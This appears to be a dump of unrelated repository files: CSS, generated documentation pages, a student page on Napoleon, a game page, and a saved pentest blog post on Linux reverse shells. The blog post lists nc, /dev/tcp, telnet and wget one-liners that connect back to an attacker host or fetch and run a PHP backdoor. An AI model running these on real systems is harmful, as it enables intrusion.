.formio .blck .row p.hint, .formio .blck .row p.err { margin-left: 0; }
/* Type-specific */
.formio .checkbox input, .formio .checkbox label.checkbox, .formio input[type=radio] {
width: auto;
display: inline;
font-weight: normal;
border: 0;
}
.formio input[type=text], .formio input[type=password] {
padding-right: 1em; /* this balances out the currency input's left padding... */
}
.formio img.captcha {
vertical-align: middle;
}
.formio .currency {
position: relative;
white-space: nowrap;
}
.formio .currency input {
padding-left: 1em;
padding-right: 0;
width: 100%;
}
.formio .currency span {
position: absolute;
left: 0.3em;
top: 0.15em;
line-height:2em; /* IE only (see overrides at bottom) */
}
.formio .repeater .row {
padding-bottom: 0;
}
.formio .daterange .fromtime, .formio .daterange .totime,
.formio .datetime .datetimeinput {
white-space: nowrap;
}
.formio input.date { width: 6em !important; padding-right: 0; }
.formio input.time { width: 3em !important; padding-right: 0; }
/* Tokenised multivalue autocomplete */
.formio ul.token-input-list {
line-height: 1em;
width: 100%;
padding: 0;
list-style-type: none;
}
.formio li.token-input-token {
float: left;
padding: 0.2em 1.5em 0.2em 0.2em;
position: relative;
}
.formio .token-input-delete-token {
position: absolute;
top: 0.2em;
right: 0.2em;
}
.formio ul.token-input-list li.token-input-input-token {
padding: 0.2em;
margin: 0 0.2em 0 0;
}
.formio li.token-input-input-token input {
border: 0;
}
.formio li.token-input-selected-token {
color: #444;
}
/* Block-level input types with visible sublabels */
.formio div.blck.credit .row label { display: inline; }
.formio div.blck.credit .row.card-number label input { width: auto; }
.formio div.blck.credit .row.card-details label { float: left; display: block; }
.formio div.blck.credit .row label.card-expiry input { width: 4em; }
.formio div.blck.credit .row label.card-ccv input { width: 2em; }
/* Button */
.formio button, .formio input[type=submit], .formio input[type=reset], .formio input[type=button] {
font-size:1em;
cursor:pointer;
}
/* information */
.formio .status {
margin-bottom:1em;
text-align: justify;
}
.formio .required {
font-weight: bold;
font-size: 0.8em;
color: #900;
}
.formio .err, .formio .errSummary {
font-weight:bold;
color: #900;
}
.formio .invalid, .formio .row.invalid {
background-color: #FFEBE8;
}
.formio li.sectionErrors { border-color: #E8AEAE; }
.formio li.sectionErrors a { color: #A82626; }
.formio div.tabNav { float: right; }
.formio p.hint {
color: #5F5F5F;
}
.formio p.hint, .formio p.err {
font-size: 0.8em;
clear: left;
}
.formio .errSummary {
font-size: 1em;
margin: 0.5em 0;
}
.formio .tabset {
margin: 1em 0;
}
/* Browser-specific style overrides (by which I mean hacks) */
@-moz-document url-prefix() { /* Gecko overrides */
.formio .currency span {
line-height: 0.9em;
}
}
@media screen and (-webkit-min-device-pixel-ratio:0) { /* Webkit overrides */
.formio .currency span {
line-height: 1.5em;
}
}
/* Contain floats: nicolasgallagher.com/micro-clearfix-hack/ */
.clearfix:before, .clearfix:after { content: ""; display: table; }
.clearfix:after { clear: both; }
.clearfix { zoom: 1; }
|
spec/values/identifiers/escape/normalize/expected_output.css
|
xzyfer/sass-spec
|
@charset "UTF-8";
.normalize {
name-start-char: ax ax ax ax ax ax;
name-start-char-non-hex: xx;
name-start-char-non-ascii: ☃x ☃x ☃x;
name-char-in-middle: a-x a-x;
name-char-at-start: \-x \-x;
digit-in-middle: a1x a1x;
digit-at-start: \31 x \31 x;
non-printable: \0 x \1 x \2 x \3 x \4 x \5 x \6 x \7 x \8 x \b x \e x \f x \10 x \11 x \12 x \13 x \14 x \15 x \16 x \17 x \18 x \19 x \1a x \1b x \1c x \1d x \1e x \1f x \7f x;
newline: \a x \c x \d x;
name-char-interpolation-beginning: \-foo;
name-char-interpolation-middle: foo-bar;
name-char-interpolation-end: foo-;
}
|
static/docs/epydocs/bbpy.files.mkeyed.BBPyWriterUnknownError-class.html
|
chauncey/there-be-docs
|
<?xml version="1.0" encoding="ascii"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>bbpy.files.mkeyed.BBPyWriterUnknownError</title>
<link rel="stylesheet" href="epydoc.css" type="text/css" />
<script type="text/javascript" src="epydoc.js"></script>
</head>
<body bgcolor="white" text="black" link="blue" vlink="#204080"
alink="#204080">
<!-- ==================== NAVIGATION BAR ==================== -->
<table class="navbar" border="0" width="100%" cellpadding="0"
bgcolor="#a0c0ff" cellspacing="0">
<tr valign="middle">
<!-- Tree link -->
<th> <a
href="module-tree.html">Trees</a> </th>
<!-- Index link -->
<th> <a
href="identifier-index.html">Indices</a> </th>
<!-- Help link -->
<th> <a
href="help.html">Help</a> </th>
<!-- Project homepage -->
<th class="navbar" align="right" width="100%">
<table border="0" cellpadding="0" cellspacing="0">
<tr><th class="navbar" align="center"
><a class="navbar" target="_top" href="file:///G:/Web%20Development/epydoc/">EIC Site-packages</a></th>
</tr></table></th>
</tr>
</table>
<table width="100%" cellpadding="0" cellspacing="0">
<tr valign="top">
<td width="100%">
<span class="breadcrumbs">
<a href="bbpy-module.html">Package bbpy</a> ::
<a href="bbpy.files-module.html">Package files</a> ::
<a href="bbpy.files.mkeyed-module.html">Module mkeyed</a> ::
Class BBPyWriterUnknownError
</span>
</td>
<td>
<table cellpadding="0" cellspacing="0">
<!-- hide/show private -->
<tr><td align="right"><span class="options">[<a href="javascript:void(0);" class="privatelink"
onclick="toggle_private();">hide private</a>]</span></td></tr>
<tr><td align="right"><span class="options"
>[<a href="frames.html" target="_top">frames</a
>] | <a href="bbpy.files.mkeyed.BBPyWriterUnknownError-class.html"
target="_top">no frames</a>]</span></td></tr>
</table>
</td>
</tr>
</table>
<!-- ==================== CLASS DESCRIPTION ==================== -->
<h1 class="epydoc">Class BBPyWriterUnknownError</h1><p class="nomargin-top"><span class="codelink"><a href="bbpy.files.mkeyed-pysrc.html#BBPyWriterUnknownError">source code</a></span></p>
<pre class="base-tree">
object --+
|
exceptions.BaseException --+
|
exceptions.Exception --+
|
<strong class="uidshort">BBPyWriterUnknownError</strong>
</pre>
<hr />
<p>Raised whenever the server returns and error code</p>
<!-- ==================== INSTANCE METHODS ==================== -->
<a name="section-InstanceMethods"></a>
<table class="summary" border="1" cellpadding="3"
cellspacing="0" width="100%" bgcolor="white">
<tr bgcolor="#70b0f0" class="table-header">
<td colspan="2" class="table-header">
<table border="0" cellpadding="0" cellspacing="0" width="100%">
<tr valign="top">
<td align="left"><span class="table-header">Instance Methods</span></td>
<td align="right" valign="top"
><span class="options">[<a href="#section-InstanceMethods"
class="privatelink" onclick="toggle_private();"
>hide private</a>]</span></td>
</tr>
</table>
</td>
</tr>
<tr>
<td colspan="2" class="summary">
<p class="indent-wrapped-lines"><b>Inherited from <code>exceptions.Exception</code></b>:
<code>__init__</code>,
<code>__new__</code>
</p>
<p class="indent-wrapped-lines"><b>Inherited from <code>exceptions.BaseException</code></b>:
<code>__delattr__</code>,
<code>__getattribute__</code>,
<code>__getitem__</code>,
<code>__getslice__</code>,
<code>__reduce__</code>,
<code>__repr__</code>,
<code>__setattr__</code>,
<code>__setstate__</code>,
<code>__str__</code>,
<code>__unicode__</code>
</p>
<p class="indent-wrapped-lines"><b>Inherited from <code>object</code></b>:
<code>__format__</code>,
<code>__hash__</code>,
<code>__reduce_ex__</code>,
<code>__sizeof__</code>,
<code>__subclasshook__</code>
</p>
</td>
</tr>
</table>
<!-- ==================== PROPERTIES ==================== -->
<a name="section-Properties"></a>
<table class="summary" border="1" cellpadding="3"
cellspacing="0" width="100%" bgcolor="white">
<tr bgcolor="#70b0f0" class="table-header">
<td colspan="2" class="table-header">
<table border="0" cellpadding="0" cellspacing="0" width="100%">
<tr valign="top">
<td align="left"><span class="table-header">Properties</span></td>
<td align="right" valign="top"
><span class="options">[<a href="#section-Properties"
class="privatelink" onclick="toggle_private();"
>hide private</a>]</span></td>
</tr>
</table>
</td>
</tr>
<tr>
<td colspan="2" class="summary">
<p class="indent-wrapped-lines"><b>Inherited from <code>exceptions.BaseException</code></b>:
<code>args</code>,
<code>message</code>
</p>
<p class="indent-wrapped-lines"><b>Inherited from <code>object</code></b>:
<code>__class__</code>
</p>
</td>
</tr>
</table>
<!-- ==================== NAVIGATION BAR ==================== -->
<table class="navbar" border="0" width="100%" cellpadding="0"
bgcolor="#a0c0ff" cellspacing="0">
<tr valign="middle">
<!-- Tree link -->
<th> <a
href="module-tree.html">Trees</a> </th>
<!-- Index link -->
<th> <a
href="identifier-index.html">Indices</a> </th>
<!-- Help link -->
<th> <a
href="help.html">Help</a> </th>
<!-- Project homepage -->
<th class="navbar" align="right" width="100%">
<table border="0" cellpadding="0" cellspacing="0">
<tr><th class="navbar" align="center"
><a class="navbar" target="_top" href="file:///G:/Web%20Development/epydoc/">EIC Site-packages</a></th>
</tr></table></th>
</tr>
</table>
<table border="0" cellpadding="0" cellspacing="0" width="100%%">
<tr>
<td align="left" class="footer">
<a href="epydoc-log.html">Generated by Epydoc
3.0.1 on Mon Oct 8 11:15:36 2012</a>
</td>
<td align="right" class="footer">
<a target="mainFrame" href="http://epydoc.sourceforge.net"
>http://epydoc.sourceforge.net</a>
</td>
</tr>
</table>
<script type="text/javascript">
<!--
// Private objects are initially displayed (because if
// javascript is turned off then we want them to be
// visible); but by default, we want to hide them. So hide
// them unless we have a cookie that says to show them.
checkCookie();
// -->
</script>
</body>
</html>
|
pages/bio.html
|
french-rev/french-rev.github.io
|
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8" />
<title>Biography — The French Revolution</title>
<!-- Behavioral Metadata -->
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<!-- Core Metadata -->
<meta name="title" content="Stage 01, The French Revolution">
<meta name="description" content="">
<meta name="keywords" content="french, revolution">
<!-- Open Graph Metadata -->
<meta property="og:site_name" content="The French Revolution">
<meta property="og:title" content="Stage 01, The French Revolution">
<meta property="og:author" content="Sam Olaogun, Adam Papenhausen">
<meta property="og:description" content="">
<meta property="og:url" content="">
<!-- Styles -->
<link href="/article-styles.css" type='text/css' rel="stylesheet">
<link href="normalize.css" type="text/css" rel="stylesheet">
<!-- Scipts -->
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.2/jquery.min.js"></script>
<script src="https://ajax.googleapis.com/ajax/libs/jqueryui/1.11.4/jquery-ui.min.js"></script>
<script src="vendors/jquery.easings.min.js"></script>
<script type="text/javascript" src="vendors/scrolloverflow.min.js"></script>
<script type="text/javascript" src="jquery.fullPage.js"></script>
</head>
<body>
<script>
$(document).ready(function () {
''
$('#fullpage').fullpage();
});
</script>
<div class="section">
<div class='prelude bio'>
<div class='title'>
<h3>NAPOLEON BONAPARTE</h3>
<svg height="60" width="2">
<line x1="0" y1="0" x2="0" y2="60" style="stroke: #FFFFFF; stroke-width: 1"></line>
</svg>
<a>BIOGRAPHY</a>
<svg height="60" width="2">
<line x1="0" y1="0" x2="0" y2="60" style="stroke: #FFFFFF; stroke-width: 1"></line>
</svg>
<p>Here, Napoleon's political ideals; role within the Directory, the Consulate, and the Empire; domestic reforms; military strategy in Europe; downfall of military executions, and personal life events will be discussed</p>
</div>
</div>
</div>
<div class="section">
<div class="one">
<div class="text-left" id="first">
<p id="num">01</p>
<p id="title">Birth (1769)</p>
<p id="pap">Born in Corsica 1769, right after the French colonization of a once proudly independent nation that had resisted larger countries influence for centuries.</p>
</div>
<div class="text-left">
<p id="num">02</p>
<p id="title">Corsican Roots.</p>
<div id="pap-right-wrapper">
<p id="pap">Napoleon was raised with a scathing hatred of anything french, as a result of his Corsican upbringing. Napoleon’s father, to his disgust, rather than fighting to rebel instead decided to submit and work for France.Napoleon viewed this as weak and spineless, led to him favoring his mother, whom he idolized.</p>
</div>
</div>
<div class="image bio-1"></div>
<div class="text-left">
<p id="num">03</p>
<p id="title">Napoleon the Scholar.</p>
<p id="pap">Napoleon goes to study in France, at it's peak. Additionally, Napoleon, <i>as a result of his father’s role in French diplomacy</i> got a scholarship to the Royal Military School in 1778. He was nine years old at the time. By the time that he turned 15, he was promoted the Royal Military Academy. Napoleon was not very popular at school because of this ambition and egotistical personality. He was also looked down upon, and was antisocial because of his Corsican identity.</p>
</div>
<div class="text-left">
<p id="num">04</p>
<p id="title">Rise to power.</p>
<p id="pap">Napoleon starts out as a Second Lieutenant in the French Cavalry. Here, he comes to power, and welcomes it. He is not necessairly a revolutionary. He agrees with Robspierre's desire for order, but despises his use of Terror to obtain it. Napoleon jumps into the revolution by returning to Corsica to acquire power in government. Napoleon and his family are banished from moving back after Napoleon trying to retake power from the established government that was against France. Next, Napoleon, turns to France in turmoil, returns to his position in France and achieves success in the military and wins many battles with simple, virtuosic plans. Napoleon, being self-educated man, is liked by the French populace.</p>
</div>
<div class="text-left">
<p id="num">05</p>
<p id="title">The Napoleonic Wars. (Timeline)</p>
<ul id="pap">
<li>Napoleon deployed to Austria.</li>
<li>Victorious in many battles.</li>
<li>Becomes comrades with his men.</li>
<li>Fights alongside them on the battlefield, making him powerful on the field.</li>
<li>Napoleon deployed to Northern Italy.</li>
<li>Again victorious many times.</li>
<li>Begins to become frustrated with his lack of progress.</li>
<li>Napoleon goes to Egypt, loses his ships and traps his men to British.</li>
<li>This failure just one of many that leads to Directory being hated.</li>
<li>Napoleon returns and begins a coup</li>
<p id="dark">** Overall, Napoleon served the Directory’s goals as a military general on the battlefield. He was mostly successful but his losses were contributory to dissent towards Directory that he served. Later on, Napoleon dissolved the Directory through a coup alongside Abbe Sieyes and took power over France. France returned to a monarchy through the consulate. (1799) **</p>
</ul>
</div>
<div class="text-left">
<p id="num">06</p>
<p id="title">The Consulate.</p>
<p id="pap">Now that Napoleon is in power, he makes a <a href="/pages/consulate.html">few changes.</a>
</p>
</div>
<a class="footer" href="/index.html">Go Back</a>
</div>
</div>
</body>
</html>
|
algorithm/java-ml/javaml-0.1.7/doc/net/sf/javaml/filter/class-use/RetainAttributes.html
|
diyerland/saveAll
|
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- NewPage -->
<html lang="en">
<head>
<!-- Generated by javadoc (version 1.7.0_05) on Mon Jul 09 21:14:46 EDT 2012 -->
<title>Uses of Class net.sf.javaml.filter.RetainAttributes (Java Machine Learning Library 0.1.7)</title>
<meta name="date" content="2012-07-09">
<link rel="stylesheet" type="text/css" href="../../../../../stylesheet.css" title="Style">
</head>
<body>
<script type="text/javascript"><!--
if (location.href.indexOf('is-external=true') == -1) {
parent.document.title="Uses of Class net.sf.javaml.filter.RetainAttributes (Java Machine Learning Library 0.1.7)";
}
//-->
</script>
<noscript>
<div>JavaScript is disabled on your browser.</div>
</noscript>
<!-- ========= START OF TOP NAVBAR ======= -->
<div class="topNav"><a name="navbar_top">
<!-- -->
</a><a href="#skip-navbar_top" title="Skip navigation links"></a><a name="navbar_top_firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../../../../../overview-summary.html">Overview</a></li>
<li><a href="../package-summary.html">Package</a></li>
<li><a href="../../../../../net/sf/javaml/filter/RetainAttributes.html" title="class in net.sf.javaml.filter">Class</a></li>
<li class="navBarCell1Rev">Use</li>
<li><a href="../package-tree.html">Tree</a></li>
<li><a href="../../../../../deprecated-list.html">Deprecated</a></li>
<li><a href="../../../../../index-all.html">Index</a></li>
<li><a href="../../../../../help-doc.html">Help</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li>Prev</li>
<li>Next</li>
</ul>
<ul class="navList">
<li><a href="../../../../../index.html?net/sf/javaml/filter/class-use/RetainAttributes.html" target="_top">Frames</a></li>
<li><a href="RetainAttributes.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_top">
<li><a href="../../../../../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_top");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<a name="skip-navbar_top">
<!-- -->
</a></div>
<!-- ========= END OF TOP NAVBAR ========= -->
<div class="header">
<h2 title="Uses of Class net.sf.javaml.filter.RetainAttributes" class="title">Uses of Class<br>net.sf.javaml.filter.RetainAttributes</h2>
</div>
<div class="classUseContainer">No usage of net.sf.javaml.filter.RetainAttributes</div>
<!-- ======= START OF BOTTOM NAVBAR ====== -->
<div class="bottomNav"><a name="navbar_bottom">
<!-- -->
</a><a href="#skip-navbar_bottom" title="Skip navigation links"></a><a name="navbar_bottom_firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../../../../../overview-summary.html">Overview</a></li>
<li><a href="../package-summary.html">Package</a></li>
<li><a href="../../../../../net/sf/javaml/filter/RetainAttributes.html" title="class in net.sf.javaml.filter">Class</a></li>
<li class="navBarCell1Rev">Use</li>
<li><a href="../package-tree.html">Tree</a></li>
<li><a href="../../../../../deprecated-list.html">Deprecated</a></li>
<li><a href="../../../../../index-all.html">Index</a></li>
<li><a href="../../../../../help-doc.html">Help</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li>Prev</li>
<li>Next</li>
</ul>
<ul class="navList">
<li><a href="../../../../../index.html?net/sf/javaml/filter/class-use/RetainAttributes.html" target="_top">Frames</a></li>
<li><a href="RetainAttributes.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_bottom">
<li><a href="../../../../../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_bottom");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<a name="skip-navbar_bottom">
<!-- -->
</a></div>
<!-- ======== END OF BOTTOM NAVBAR ======= -->
<p class="legalCopy"><small>
<i>Copyright © 2006-2012 - <a target=_blank href=http://www.abeel.be/>Thomas Abeel</a> - All Rights Reserved.</i>
<a href=http://sourceforge.net><img src=http://sflogo.sourceforge.net/sflogo.php?group_id=179204&type=1 width=88 height=31 border=0 alt=SourceForge.netLogo /></a>
</small></p>
</body>
</html>
|
misc/info/7 Linux Shells Using Built-in Tools.html
|
chrisbensch/scripts
|
<!DOCTYPE html>
<!-- saved from url=(0071)http://www.lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/ -->
<html lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta charset="utf-8">
<title>7 Linux Shells Using Built-in Tools</title>
<meta name="author" content="Tim Tomes">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<script async="" src="./7 Linux Shells Using Built-in Tools_files/"></script><script src="./7 Linux Shells Using Built-in Tools_files/jquery-1.10.2.min.js" type="text/javascript"></script><style type="text/css"></style>
<script src="./7 Linux Shells Using Built-in Tools_files/bootstrap.min.js" type="text/javascript"></script>
<link href="./7 Linux Shells Using Built-in Tools_files/bootstrap.min.css" rel="stylesheet" type="text/css">
<link href="./7 Linux Shells Using Built-in Tools_files/style.css" rel="stylesheet" type="text/css" media="screen" charset="utf-8">
<link rel="shortcut icon" href="http://www.gravatar.com/avatar/0a6d9b1ad59ad436bf9d9d16b2a7133e?s=16">
<!--[if lt IE 9]>
<script src="/assets/themes/bootstrap/resources/respond/Respond.min.js"></script>
<![endif]-->
<link href="http://www.lanmaster53.com/atom.xml" type="application/atom+xml" rel="alternate" title="Sitewide ATOM Feed">
<link href="http://www.lanmaster53.com/rss.xml" type="application/rss+xml" rel="alternate" title="Sitewide RSS Feed">
<script type="text/javascript" charset="utf-8" async="" src="./7 Linux Shells Using Built-in Tools_files/"></script><link rel="stylesheet" type="text/css" href="chrome-extension://pkehgijcmpdhfbdbbnkijodmdjhbjlgp/skin/socialwidgets.css"></head>
<body>
<div class="container">
<nav class="navbar navbar-default" role="navigation">
<div>
<ul class="meta">
<li><a href="http://www.lanmaster53.com/"><img src="./7 Linux Shells Using Built-in Tools_files/0a6d9b1ad59ad436bf9d9d16b2a7133e.png" class="avatar"></a></li>
<li><a href="https://bitbucket.org/lanmaster53" target="_blank"><img src="./7 Linux Shells Using Built-in Tools_files/bitbucket.png"></a></li>
<li><a href="https://github.com/lanmaster53" target="_blank"><img src="./7 Linux Shells Using Built-in Tools_files/github.png"></a></li>
<li><a href="https://twitter.com/lanmaster53" target="_blank"><img src="./7 Linux Shells Using Built-in Tools_files/" style="display: none !important;"></a></li>
<li><a href="https://www.linkedin.com/in/lanmaster53" target="_blank"><img src="./7 Linux Shells Using Built-in Tools_files/" style="display: none !important;"></a></li>
<li><a href="https://www.youtube.com/user/lanmaster53" target="_blank"><img src="./7 Linux Shells Using Built-in Tools_files/" style="display: none !important;"></a></li>
<li><a href="http://www.lanmaster53.com/contact/"><img src="./7 Linux Shells Using Built-in Tools_files/email.png"></a></li>
<li><a href="http://www.lanmaster53.com/atom.xml"><img src="./7 Linux Shells Using Built-in Tools_files/rss.png"></a></li>
</ul>
</div>
<div class="navbar-header">
<button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-ex1-collapse">
<span class="sr-only">Toggle navigation</span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<!--a class="navbar-brand" href="/">lanmaster53.com</a-->
</div>
<div class="collapse navbar-collapse navbar-ex1-collapse"><!-- navbar-ex1-collapse class designation required for button linkage -->
<ul class="nav navbar-nav">
<li><a href="http://www.lanmaster53.com/projects/">Projects</a></li>
<li><a href="http://www.lanmaster53.com/training/">Training</a></li>
<li><a href="http://www.lanmaster53.com/services/">Services</a></li>
<li><a href="http://www.lanmaster53.com/archive/">Archive</a></li>
<li><a href="http://www.lanmaster53.com/categories/">Categories</a></li>
<li><a href="http://www.lanmaster53.com/about/">About</a></li>
<li><a href="http://www.lanmaster53.com/contact/">Contact</a></li>
</ul>
</div>
</nav>
<div class="page-header">
<h1><a href="http://www.lanmaster53.com/">lanmaster53.com</a></h1>
<h4>a hacker looking out for users by educating...</h4>
</div>
<div class="row">
<div class="col-xs-12">
<h2>7 Linux Shells Using Built-in Tools </h2>
<h4><span>Friday, May 27, 2011</span></h4>
<div>
<p>There are many distributions of linux, and they all do things a little different regarding default security and built-in tool sets. Which means when engaging these different flavors during a pentest, what works against one linux target to get an interactive shell, may not work against another. Well, not to worry my friends, there are many techniques for spawning shells, specifically reverse shells, from linux, and one or more of these techniques is bound to be available no matter which distro you’re looking at.</p>
<p>The scenario is this: You have the ability to run a simple command, or cause a user to run a simple command, on the target system. Whether it be via a Remote Command Execution vulnerability in a website, or some sort of php injected XSS which causes a privileged user to run commands on the target system. There are many instances of this scenario. Starting from the easiest and most common, here are some of the techniques which can be used to gain reverse shell on the target system.</p>
<h3 id="netcat">#1. netcat</h3>
<p>Surprise!!! Nothing new here. Plain and simple. Fire up a listener on the attacker machine on a port which is reachable from the target and connect back to the listener with netcat. Looks like this.</p>
<p><img src="./7 Linux Shells Using Built-in Tools_files/netcat.jpg" alt=""></p>
<p>…just kidding…</p>
<p><img src="./7 Linux Shells Using Built-in Tools_files/sh_nc_shell.png" alt=""></p>
<h3 id="netcat-with-gapingsecurityhole-disabled">#2. netcat with GAPING_SECURITY_HOLE disabled:</h3>
<p>This is a little trick that <a href="https://twitter.com/#!/edskoudis">Ed Skoudis</a> tweeted about in November of last year, but I haven’t seen it widely publicized. It is based on the common technique used to build netcat relays. When the <code class="highlighter-rouge">GAPING_SECURITY_HOLE</code> is disabled, which means you don’t have access to the ‘-e’ option of netcat, most people pass on using netcat and move to something else. Well this just isn’t necessary. Create a FIFO file system object and use it as a backpipe to relay standard output from commands piped from netcat to /bin/bash back into netcat. Sounds confusing right? The following image should clear things up.</p>
<p><img src="./7 Linux Shells Using Built-in Tools_files/sh_nc_gsh_shell.png" alt=""></p>
<h3 id="netcat-without-netcat">#3. netcat without netcat:</h3>
<p>I love “hacks” that use features of the operating system against itself. This is one of those “hacks”. It takes the /dev/tcp socket programming feature and uses it to redirect /bin/bash to a remote system. It’s not always available, but can be quite handy when it is.</p>
<p><img src="./7 Linux Shells Using Built-in Tools_files/sh_nc_wo_nc.png" alt=""></p>
<h3 id="netcat-without-netcat-or-devtcp">#4. netcat without netcat or /dev/tcp:</h3>
<p>/dev/tcp not available either? Just use telnet with technique #2.</p>
<p><img src="./7 Linux Shells Using Built-in Tools_files/sh_nc_telnet.png" alt=""></p>
<h3 id="telnet-to-telnet">#5. telnet-to-telnet:</h3>
<p>I’m not sure why you’d use this technique, but it’s an option, so here it is nonetheless. This is clearly the ugliest of the techniques. This technique uses two telnet sessions connected to remote listeners to pipe input from one telnet session to /bin/bash, and pipe the output to the second telnet session. Commands are entered into one the of the attackers listeners and feedback is received on the other.</p>
<p><img src="./7 Linux Shells Using Built-in Tools_files/sh_tel2tel.png" alt=""></p>
<h3 id="rce-shell">#6. RCE shell:</h3>
<p>On this one I’m cheating a little bit. This applies to Remote Command Execution vulnerabilities only. Rather than manually enter commands into a proxy or browser url, I wrote small python script which gives you the feel of a shell, without spawning anything in reverse from the target. You merely pass the script the vulnerable url with the injectable field replaced with the ‘<rce>’ tag and it presents you with a clean interface for entering commands. In the background, the script is making the request to the web server, parsing the response, and presenting it to you.</p>
<p><img src="./7 Linux Shells Using Built-in Tools_files/sh_rce.png" alt=""></p>
<h3 id="php-reverse-shell-via-interactive-console">#7. PHP reverse shell via interactive console:</h3>
<p>The last technique makes use of the php interactive console. The attacker issues one command which moves to the /tmp directory (because it is typically world writable), uses wget to download a malicious php reverse_tcp backdoor (which the attacker hosts on a web server that he controls), and executes the backdoor via the interactive console.</p>
<p><img src="./7 Linux Shells Using Built-in Tools_files/sh_php.png" alt=""></p>
<p>I want to end this post by stating that I am not the originator of techniques #1, 2, 3, 5, or 7. The majority of these techniques were learned in Ed Skoudis’ amazing Security 504 and 560 classes available through SANS. Technique #4 is something I’ve never seen but stumbled across as I was conducting the demos for this post, so I’ll take credit. Obviously, anyone can do #6, and there are plugins for various automated web app testing software packages that do, but I built my script from the ground up and tailored it to preference. If you know of any additional methods that may be helpful to the pentesting community, please leave in the comments below. Without sharing, we all fail. Thanks, and enjoy!</p>
<p>For copy and paste:</p>
<div class="highlighter-rouge"><pre class="highlight"><code><span class="c">#1</span>
nc <attacker_ip> <port> -e /bin/bash
<span class="c">#2</span>
mknod backpipe p; nc <attacker_ip> <port> 0<backpipe | /bin/bash 1>backpipe
<span class="c">#3</span>
/bin/bash -i > /dev/tcp/<attacker_ip>/<port> 0<&1 2>&1
<span class="c">#4</span>
mknod backpipe p; telnet <attacker_ip> <port> 0<backpipe | /bin/bash 1>backpipe
<span class="c">#5</span>
telnet <attacker_ip> <1st_port> | /bin/bash | telnet <attacker_ip> <2nd_port>
<span class="c">#7</span>
wget -O /tmp/bd.php <url_to_malicious_file> <span class="o">&&</span> php -f /tmp/bd.php
</code></pre>
</div>
</div>
<p>Like what you see? Join me for live training! See the <a href="http://www.lanmaster53.com/training/">Training</a> page for more information.</p>
<ul class="tag_box inline">
<li><a href="http://www.lanmaster53.com/categories/#network security-ref">
network security <span>9</span>
</a></li>
</ul>
<ul class="pagination">
<li class="prev"><a href="http://www.lanmaster53.com/2011/05/stealth-cookie-stealing-new-xss-technique/" title="Stealth Cookie Stealing (XSS technique)">← Previous</a></li>
<li><a href="http://www.lanmaster53.com/archive/">Archive</a></li>
<li class="next"><a href="http://www.lanmaster53.com/2012/12/defending-against-ssl-stripping-attacks/" title="Defending Against SSL Stripping Attacks">Next →</a></li>
</ul>
<hr>
<div>
<h4>Please share your thoughts, comments, and suggestions via Twitter.</h4>
<img src="chrome-extension://pkehgijcmpdhfbdbbnkijodmdjhbjlgp/skin/socialwidgets/Twitter.svg" class="privacyBadgerReplacementButton" title="PrivacyBadger has replaced this Twitter button.">
<a href="http://twitter.com/lanmaster53" class="twitter-follow-button twitter-follow-button-error" data-show-count="false" data-twitter-extracted-i1458036320930675930="true">Follow @lanmaster53</a>
<script src="./7 Linux Shells Using Built-in Tools_files/widgets.js" type="text/javascript"></script>
</div>
</div>
</div>
<hr>
<footer>
<p>
© 2016 Tim Tomes
<span class="pull-right text-muted">
powered by
<a href="https://github.com/dbtek/jekyll-bootstrap-3" target="_blank" title="The Definitive Jekyll Blogging Framework">Jekyll-Bootstrap-3</a>
and <a href="http://getbootstrap.com/" target="_blank">Twitter Bootstrap</a>
</span>
</p>
</footer>
</div>
<script>
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','//www.google-analytics.com/analytics.js','ga');
ga('create', 'UA-52269615-1', 'lanmaster53.com');
ga('send', 'pageview');
</script>
<iframe id="rufous-sandbox" scrolling="no" frameborder="0" allowtransparency="true" allowfullscreen="true" style="position: absolute; visibility: hidden; display: none; width: 0px; height: 0px; padding: 0px; border: none;"></iframe></body></html>
|
TAIHAO2019/pub/SmallGame/AsFastAsYouCan2/c6d461bb6af47effe441fcd33a5b54527ff0295310264cc4eb91762167c1ef8c.html
|
simonmysun/praxis
|
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>18 --> 19</title>
<link href="./../../assets/style.css" rel="stylesheet">
</head>
<body>
<h2>You have to be fast</h2>
<a href="./dd41f41b4e6a05ba9026891235b8196a8f1e9230ef0a897b786bdb4bf7efedc6.html">Teleport</a>
<hr>
<a href="./../../about.md">About</a> (Spoilers! )
<script src="./../../assets/md5.js"></script>
<script>
window.currentLevel = 7;
</script>
<script src="./../../assets/script.js"></script>
</body>
</html>
|
clean/Linux-x86_64-4.03.0-2.0.5/released/8.6/hammer/1.2+8.11.html
|
coq-bench/coq-bench.github.io
|
